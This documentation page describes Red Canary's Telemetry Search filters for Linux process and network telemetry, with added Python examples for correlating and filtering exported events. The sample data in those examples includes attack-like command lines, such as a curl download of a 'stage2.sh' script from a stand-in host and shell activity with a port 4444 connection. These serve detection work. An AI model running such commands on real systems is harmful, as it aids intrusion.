Use Telemetry Search
    • 15 Jul 2024

    Telemetry Search is a service that indexes all process starts and network connections from the last seven days of activity. Red Canary now includes a Telemetry Search page and search bar where you can filter on specific telemetry attributes and view the results in a sortable table. Selecting a row opens a slide-out panel that displays all the data recorded for that process.

    You can run a keyword search in Telemetry Search to find information about process launches and network connections. Results are indexed by and served from a third-party search engine (OpenSearch), so they are returned quickly and accurately. The search also supports partial matches and wildcards, so you can find a broader set of related telemetry.

    All Telemetry Search results can be exported to a CSV file, so you can work with the data outside the constraints of the platform.

    This tool complements the existing Shell Activities feature, which detects process starts that most likely originated in a shell, by making it quick and straightforward to pinpoint individual processes. Indexing all process starts and network connections lets you discover processes and correlate them with the data Red Canary already provides.

    It also gives detection engineers a single page on which to locate processes and network connections for threat and event analysis.
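    The kind of correlation described above, worked through on an exported CSV, as an added example that is not Red Canary's own code: it joins shell-launched process starts to external network connections from the same host and PID within a short window. The column headers are an assumption (the attribute names used by the Telemetry Search filters); the page does not document the real export layout, so rename them to match your file. The rows are constructed sample data.

```python
"""Correlate process starts with network connections from a Telemetry Search
CSV export: shell-launched processes that then made an external connection.

Added example, not Red Canary code. Assumption: the export's column headers
are the attribute names used by the Telemetry Search filters (event_type_cd,
activity_at, host_name, process_pid, ...); the real export layout is not
documented on this page.
"""
import csv
import io
from datetime import datetime, timedelta, timezone

# Constructed export (not real telemetry), one row per event. PID 777 on
# k8s-node-01 is deliberately reused by two processes to show why the join
# needs a time window and not just (host, pid).
EXPORT_CSV = """\
event_type_cd,activity_at,host_name,process_pid,process_name,process_command_line,is_shell_activity,remote_ip,remote_port,remote_location_cd
process_start,2022-08-02T10:15:00Z,bob_workstation,4242,curl,curl -s http://example.com/stage2.sh,true,,,
network_connection,2022-08-02T10:15:02Z,bob_workstation,4242,curl,curl -s http://example.com/stage2.sh,,203.0.113.10,80,external
process_start,2022-08-02T10:20:00Z,bob_workstation,4300,apt,apt update,false,,,
network_connection,2022-08-02T10:20:05Z,bob_workstation,4300,apt,apt update,,203.0.113.50,443,external
process_start,2022-08-02T11:00:00Z,k8s-node-01,777,sh,/bin/sh -c id,true,,,
network_connection,2022-08-02T11:30:00Z,k8s-node-01,777,sh,/bin/sh -c id,,198.51.100.7,4444,external
process_start,2022-08-02T12:00:00Z,k8s-node-01,777,bash,bash -i,true,,,
"""


def parse_ts(text):
    """ISO 8601 date-time from the export; naive values are treated as UTC."""
    parsed = datetime.fromisoformat(text.replace("Z", "+00:00"))
    return parsed if parsed.tzinfo else parsed.replace(tzinfo=timezone.utc)


def load_export(csv_text):
    """Rows of the export as dicts keyed by column header."""
    return list(csv.DictReader(io.StringIO(csv_text)))


def shell_egress(rows, window_seconds=300):
    """Join shell-flagged process_start rows to external network_connection
    rows for the same host and PID that occur within window_seconds after
    the start.

    (host_name, process_pid) is the only join key these columns offer, and
    PIDs are reused, so the window is what stops a later process with the
    same PID from inheriting an earlier connection (or the reverse).
    """
    window = timedelta(seconds=window_seconds)
    conns = {}
    for row in rows:
        if (row["event_type_cd"] == "network_connection"
                and row["remote_location_cd"] == "external"):
            conns.setdefault((row["host_name"], row["process_pid"]), []).append(row)

    hits = []
    for row in rows:
        if row["event_type_cd"] != "process_start" or row["is_shell_activity"] != "true":
            continue
        started = parse_ts(row["activity_at"])
        for conn in conns.get((row["host_name"], row["process_pid"]), []):
            delta = parse_ts(conn["activity_at"]) - started
            if timedelta(0) <= delta <= window:
                hits.append({
                    "host": row["host_name"],
                    "pid": row["process_pid"],
                    "command_line": row["process_command_line"],
                    "remote": f'{conn["remote_ip"]}:{conn["remote_port"]}',
                    "seconds_after_start": int(delta.total_seconds()),
                })
    return hits


if __name__ == "__main__":
    for hit in shell_egress(load_export(EXPORT_CSV)):
        print(hit)
```

    With the default five-minute window only the curl launch on bob_workstation is reported; widening the window to an hour also pulls in the sh process on k8s-node-01, while the later bash process that reused PID 777 is never matched to the connection that preceded it.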

    Assess Linux EDR telemetry

    To assess your Linux EDR telemetry, you can filter by telemetry attributes.

    1. From the navigation menu, click Telemetry.

    2. Enter attributes in the Telemetry Search filter bar, and then press Enter or Return.

    You can search by keyword:value on any of the supported filter attributes. Wildcards are supported: a trailing * matches every value that begins with the text before the wildcard.

    Note: Text searches are always fuzzy matched unless the value contains a *.

    Supported filter attributes

    Event attributes

    Attribute  | Description                                                               | Example
    -----------|---------------------------------------------------------------------------|---------------------------------
    Event Type | The type of event that occurred: a process start or a network connection. | event_type_cd:network_connection
               |                                                                           | event_type_cd:process_start

    Telemetry attributes

    Attribute         | Description                                                                          | Example
    ------------------|--------------------------------------------------------------------------------------|-----------------------
    Is Shell Activity | A boolean indicating whether the process was launched as an interactive shell command. | is_shell_activity:true
    Shell             | The shell from which the process was executed.                                       | shell:bash

    Network attributes

    Attribute      | Description                                                    | Example
    ---------------|----------------------------------------------------------------|----------------------------
    Domain         | The domain name of the network connection.                     | domain:example.com
    Local IP       | The local IP address of the network connection.                | local_ip:127.0.0.1
    Local port     | The local port of the network connection.                      | local_port:43
    Local IP Type  | The address family (ipv4 or ipv6) of the local IP address.     | local_ip_type_cd:ipv4
    Remote IP      | The remote IP address of the network connection.               | remote_ip:127.0.0.1
    Remote port    | The remote port of the network connection.                     | remote_port:8080
    Location       | Whether the remote address is internal or external.            | remote_location_cd:external
    Remote IP Type | The address family (ipv4 or ipv6) of the remote IP address.    | remote_ip_type_cd:ipv6
    Protocol       | The transport protocol of the network connection.              | protocol_cd:tcp
    Direction      | The direction of the network connection: inbound or outbound.  | direction_cd:outbound

    Endpoint attributes

    Attribute                 | Description                          | Example
    --------------------------|--------------------------------------|-----------------------------------------------------------------------
    Hostname                  | The hostname of the endpoint.        | host_name:bob_workstation
    Endpoint Operating System | The endpoint's operating system.     | endpoint_operating_system:ubuntu
    Sensor                    | The unique ID of the endpoint's sensor. | sensor_id:719d97fc-7ead-4927-b8c9-adffb77f2b79
    Sensor Version            | The endpoint's sensor version.       | sensor_product_ver:1.4.2-Release-a64b5688fc19b7b163ce409f24ecf763925de396

    To filter endpoints by operating system, use the operating_system: field. Either type a single word after the colon, for example operating_system:windows, or enclose multiple words in double quotes, for example operating_system:"Windows 10". The field is not case-sensitive and matches both the specific operating system reported by the endpoint and its canonicalized name.

    Process attributes

    Attribute                   | Description                                                                    | Example
    ----------------------------|--------------------------------------------------------------------------------|----------------------------------------------------------------------------------
    Activity At                 | The date or date range at which the process activity occurred (see the date filter syntax below). | activity_at:2022-08-01..
                                |                                                                                | activity_at:2022-08-01..2022-08-05
    Process command line        | The command line used by the process.                                          | process_command_line:/usr/bin/cp
    Parent process command line | The command line of the parent process.                                        | parent_process_command_line:/usr/bin/ls
    Process name                | The name of the process.                                                       | process_name:cp
    Parent process name         | The name of the parent process.                                                | parent_process_name:ls
    Process path                | The path of the process.                                                       | process_path:/usr/bin/cp
    Parent process path         | The path of the parent process.                                                | parent_process_path:/usr/bin/l
    Process PID                 | The process identifier (PID) of the process.                                   | process_pid:123456
    Parent process PID          | The process identifier (PID) of the parent process.                            | parent_process_pid:123455
    Process MD5                 | The MD5 hash of the process's executable.                                      | process_md5:6f0fd9cced2852bc85a2722750ab7d64
    Parent process MD5          | The MD5 hash of the parent process's executable.                               | parent_process_md5:5e446692e912c1933eb0499b91a524bb
    Process SHA256              | The SHA-256 hash of the process's executable.                                  | process_sha256:a9d2e611bdff6e1d384abb25229a849762405120f9973be23156d4efca3d979e
    Parent process SHA256       | The SHA-256 hash of the parent process's executable.                           | parent_process_sha256:abce6efe522d7e7bd8bdf6ecd82eda581a1514f8dea858d700766dc165a79efb
    Working Directory           | The working directory of the process.                                          | working_directory:/tmp/

    User attributes

    Attribute       | Description                                                        | Example
    ----------------|--------------------------------------------------------------------|---------------------
    User Name       | The username of the user the process ran as.                       | user_name:bob
    Login user name | The username of the login user (the user who owns the session).    | login_user_name:bobby
    User UID        | The user identifier (UID) of the user the process ran as.          | user_uid:1234
    Login user UID  | The user identifier (UID) of the login user.                       | login_user_uid:4321

    Container attributes

    Attribute     | Description                                                             | Example
    --------------|-------------------------------------------------------------------------|-------------------------------
    Container     | The ID of the container in which the process ran.                       | container_id:123456712345
    Container Pod | The ID of the pod that holds the container in which the process ran.    | container_pod_id:123456712345

    Date filters use a from..to syntax in which either from or to may be left unbounded:

    • 2020-01-01.. matches on or after (>=) the from date

    • ..2020-01-01 matches on or before (<=) the to date

    • 2020-01-01..2020-01-31 matches on or after (>=) the from date and on or before (<=) the to date

    Dates can be specified as ISO 8601 dates or date-times.

    Examples

    Show only results of a particular event type

    To return only network connections, use the search filter:

    event_type_cd:network_connection

    To return only process starts, use the search filter:

    event_type_cd:process_start

    Show only shell activities

    To return only processes designated as originating in a shell, use the search filter:

    is_shell_activity:true

    Wildcard search for an IP

    To find network connections whose local IP address falls within a particular network, use the search filter:

    local_ip:127.0.*

    Find all processes running in a container

    To return only processes that ran inside a container, match any non-empty container ID:

    container_id:*
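    The filter syntax documented above, reproduced as a small local evaluator so its semantics can be checked against a handful of records without the platform. This is an added example, not Red Canary's code or OpenSearch's query parser. Where the page leaves behaviour unspecified, the example assumes it and says so in the comments: multiple terms are ANDed, and the platform's fuzzy text matching is approximated by a case-insensitive substring match. The records are constructed sample data keyed by the attribute names from the tables.

```python
"""Local evaluator for Telemetry Search-style filter strings.

Added example, not Red Canary code. Reproduces the documented syntax
(keyword:value terms, quoted multi-word values, the * wildcard, from..to
date ranges). Assumed where the page is silent: terms are ANDed, and the
platform's fuzzy match is approximated by a case-insensitive substring match.
"""
import re
import shlex
from datetime import datetime, timedelta, timezone

# Constructed sample telemetry (not real data); keys follow the attribute
# names in the filter tables.
SAMPLE_EVENTS = [
    {"event_type_cd": "process_start", "activity_at": "2022-08-02T10:15:00Z",
     "is_shell_activity": "true", "shell": "bash", "process_name": "curl",
     "process_command_line": "curl -s http://example.com/stage2.sh",
     "user_name": "bob", "host_name": "bob_workstation",
     "endpoint_operating_system": "Ubuntu 22.04"},
    {"event_type_cd": "network_connection", "activity_at": "2022-08-03T11:00:00Z",
     "process_name": "curl", "local_ip": "192.0.2.15", "local_port": "51234",
     "remote_ip": "203.0.113.10", "remote_port": "443", "protocol_cd": "tcp",
     "direction_cd": "outbound", "remote_location_cd": "external",
     "user_name": "bob", "host_name": "bob_workstation",
     "endpoint_operating_system": "Ubuntu 22.04"},
    {"event_type_cd": "process_start", "activity_at": "2022-08-06T09:30:00Z",
     "is_shell_activity": "false", "process_name": "sh",
     "process_command_line": "/bin/sh -c id",
     "container_id": "3f1c2a9b7d21", "container_pod_id": "9b2e4c7a1d33",
     "user_name": "root", "host_name": "k8s-node-01",
     "endpoint_operating_system": "Ubuntu 20.04"},
    {"event_type_cd": "network_connection", "activity_at": "2022-07-30T08:00:00Z",
     "process_name": "sshd", "local_ip": "10.0.0.5", "local_port": "22",
     "remote_ip": "10.0.0.9", "remote_port": "50022", "protocol_cd": "tcp",
     "direction_cd": "inbound", "remote_location_cd": "internal",
     "user_name": "root", "host_name": "k8s-node-01",
     "endpoint_operating_system": "Ubuntu 20.04"},
]

DATE_FIELDS = {"activity_at"}


def parse_query(query):
    """Split a filter string into (key, value) terms. shlex keeps a quoted
    multi-word value such as "Windows 10" attached to its key."""
    terms = []
    for token in shlex.split(query):
        if ":" not in token:
            raise ValueError(f"term {token!r} is not keyword:value")
        key, value = token.split(":", 1)
        terms.append((key.lower(), value))
    return terms


def _parse_iso(text):
    """Accept ISO 8601 dates or date-times; treat naive values as UTC."""
    parsed = datetime.fromisoformat(text.replace("Z", "+00:00"))
    return parsed if parsed.tzinfo else parsed.replace(tzinfo=timezone.utc)


def match_date(value, pattern):
    """from..to with either side unbounded, inclusive on both ends. A plain
    date as the 'to' bound covers the whole of that day."""
    if ".." not in pattern:
        raise ValueError("date filters use the from..to syntax")
    start, end = pattern.split("..", 1)
    when = _parse_iso(value)
    if start and when < _parse_iso(start):
        return False
    if end:
        end_at = _parse_iso(end)
        if len(end) == 10:  # date only: on or before means through end of day
            return when < end_at + timedelta(days=1)
        return when <= end_at
    return True


def match_text(value, pattern):
    """Case-insensitive match; * matches any run of characters."""
    value, pattern = str(value).lower(), pattern.lower()
    if "*" in pattern:
        regex = ".*".join(re.escape(part) for part in pattern.split("*"))
        return re.fullmatch(regex, value) is not None
    return pattern in value  # assumption: stand-in for the platform's fuzzy match


def match_event(event, terms):
    """All terms must match (assumed AND semantics); absent or empty fields never match."""
    for key, pattern in terms:
        value = event.get(key)
        if value in (None, ""):
            return False
        matcher = match_date if key in DATE_FIELDS else match_text
        if not matcher(value, pattern):
            return False
    return True


def search(query, events=SAMPLE_EVENTS):
    """Return the events matching a Telemetry Search-style filter string."""
    terms = parse_query(query)
    return [event for event in events if match_event(event, terms)]


if __name__ == "__main__":
    for query in ("event_type_cd:network_connection", "is_shell_activity:true",
                  "local_ip:10.0.*", "container_id:*",
                  "activity_at:2022-08-01..2022-08-05",
                  'endpoint_operating_system:"Ubuntu 22.04" user_name:bob'):
        hits = search(query)
        print(f"{query!r}: {len(hits)} hit(s)",
              [(h["activity_at"], h["event_type_cd"]) for h in hits])
```

    Two points the table alone does not make obvious: container_id:* only returns records that actually carry a container ID, because an empty field never matches, and a date-only upper bound such as ..2022-08-05 includes events on 5 August itself, so a range written as dates behaves inclusively at both ends.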
